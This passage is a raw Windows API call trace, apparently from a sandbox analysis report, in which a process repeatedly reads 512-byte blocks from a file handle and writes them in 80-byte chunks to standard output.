lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.004] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.004] GetFileType (hFile=0x50) returned 0x1 [0233.004] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.004] GetFileType (hFile=0x50) returned 0x1 [0233.004] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.004] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.004] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.004] GetFileType (hFile=0x50) returned 0x1 [0233.004] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.004] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.005] GetFileType (hFile=0x50) returned 0x1 [0233.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.005] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.005] GetFileType (hFile=0x50) returned 0x1 [0233.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.005] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.005] GetFileType (hFile=0x50) returned 0x1 [0233.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.005] WriteFile (in: 
hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.005] GetFileType (hFile=0x50) returned 0x1 [0233.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.005] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.005] GetFileType (hFile=0x50) returned 0x1 [0233.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.005] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.005] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.005] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.006] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.006] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.006] GetFileType (hFile=0x50) returned 0x1 [0233.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.006] GetFileType (hFile=0x50) returned 0x1 [0233.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.006] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.006] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0233.006] GetFileType (hFile=0x50) returned 0x1 [0233.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.006] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.006] GetFileType (hFile=0x50) returned 0x1 [0233.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.006] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.006] GetFileType (hFile=0x50) returned 0x1 [0233.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.006] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.006] GetFileType (hFile=0x50) returned 0x1 [0233.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.006] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.006] GetFileType (hFile=0x50) returned 0x1 [0233.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.007] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.007] _get_osfhandle (_FileHandle=1) returned 0x50 
[0233.007] GetFileType (hFile=0x50) returned 0x1 [0233.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.007] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.007] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.007] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.007] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.007] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.007] GetFileType (hFile=0x50) returned 0x1 [0233.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.007] GetFileType (hFile=0x50) returned 0x1 [0233.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.007] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.007] GetFileType (hFile=0x50) returned 0x1 [0233.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.007] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.007] GetFileType (hFile=0x50) returned 0x1 [0233.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.007] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, 
lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.008] GetFileType (hFile=0x50) returned 0x1 [0233.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.008] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.008] GetFileType (hFile=0x50) returned 0x1 [0233.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.008] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.008] GetFileType (hFile=0x50) returned 0x1 [0233.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.008] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.008] GetFileType (hFile=0x50) returned 0x1 [0233.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.008] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.008] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.008] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.008] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.008] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.008] GetFileType (hFile=0x50) returned 0x1 [0233.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.009] GetFileType (hFile=0x50) returned 0x1 [0233.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.009] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.009] GetFileType (hFile=0x50) returned 0x1 [0233.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.009] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.009] GetFileType (hFile=0x50) returned 0x1 [0233.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.009] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.009] GetFileType (hFile=0x50) returned 0x1 [0233.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.009] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.009] GetFileType (hFile=0x50) returned 0x1 [0233.009] _get_osfhandle (_FileHandle=1) returned 
0x50 [0233.009] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.009] GetFileType (hFile=0x50) returned 0x1 [0233.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.009] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.010] GetFileType (hFile=0x50) returned 0x1 [0233.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.010] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.010] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.010] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.010] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.010] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.010] GetFileType (hFile=0x50) returned 0x1 [0233.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.010] GetFileType (hFile=0x50) returned 0x1 [0233.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.010] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) 
returned 1 [0233.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.010] GetFileType (hFile=0x50) returned 0x1 [0233.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.010] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.010] GetFileType (hFile=0x50) returned 0x1 [0233.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.010] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.010] GetFileType (hFile=0x50) returned 0x1 [0233.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.011] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.011] GetFileType (hFile=0x50) returned 0x1 [0233.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.011] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.011] GetFileType (hFile=0x50) returned 0x1 [0233.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.011] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.011] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0233.011] GetFileType (hFile=0x50) returned 0x1 [0233.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.011] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.011] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.011] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.011] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.011] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.011] GetFileType (hFile=0x50) returned 0x1 [0233.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.011] GetFileType (hFile=0x50) returned 0x1 [0233.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.011] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.012] GetFileType (hFile=0x50) returned 0x1 [0233.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.012] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.012] GetFileType (hFile=0x50) returned 0x1 [0233.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.012] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.012] GetFileType (hFile=0x50) returned 0x1 [0233.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.012] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.012] GetFileType (hFile=0x50) returned 0x1 [0233.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.012] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.012] GetFileType (hFile=0x50) returned 0x1 [0233.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.012] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.013] GetFileType (hFile=0x50) returned 0x1 [0233.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.013] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.013] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.013] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.013] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.013] ReadFile 
(in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.013] GetFileType (hFile=0x50) returned 0x1 [0233.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.013] GetFileType (hFile=0x50) returned 0x1 [0233.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.013] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.013] GetFileType (hFile=0x50) returned 0x1 [0233.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.013] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.013] GetFileType (hFile=0x50) returned 0x1 [0233.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.013] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.013] GetFileType (hFile=0x50) returned 0x1 [0233.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.014] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.014] GetFileType (hFile=0x50) returned 0x1 [0233.014] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0233.014] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.014] GetFileType (hFile=0x50) returned 0x1 [0233.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.014] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.014] GetFileType (hFile=0x50) returned 0x1 [0233.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.014] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.014] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.014] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.014] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.014] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.014] GetFileType (hFile=0x50) returned 0x1 [0233.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.014] GetFileType (hFile=0x50) returned 0x1 [0233.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.014] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, 
